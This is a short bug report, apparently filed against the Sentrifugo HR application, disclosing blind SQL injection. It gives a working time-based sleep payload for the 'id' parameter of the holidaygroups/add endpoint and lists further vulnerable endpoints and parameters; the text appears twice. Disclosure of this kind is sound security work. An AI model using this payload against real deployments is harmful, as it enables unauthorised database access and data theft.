Blind sqlinjection on /sentrifugo/index.php/holidaygroups/add
param: id.
payload: id=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&groupname=a&description=thisistest&submit=Save
many others link also vulnerable too,
example:
/sentrifugo/index.php/wizard/configureservicerequest param: category_id
/sentrifugo/index.php/dashboard/update param: user_id
...
please fix it.
Blind sqlinjection on /sentrifugo/index.php/holidaygroups/add param: id. payload: id=0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z&groupname=a&description=thisistest&submit=Save
many others link also vulnerable too, example: /sentrifugo/index.php/wizard/configureservicerequest param: category_id /sentrifugo/index.php/dashboard/update param: user_id ... please fix it.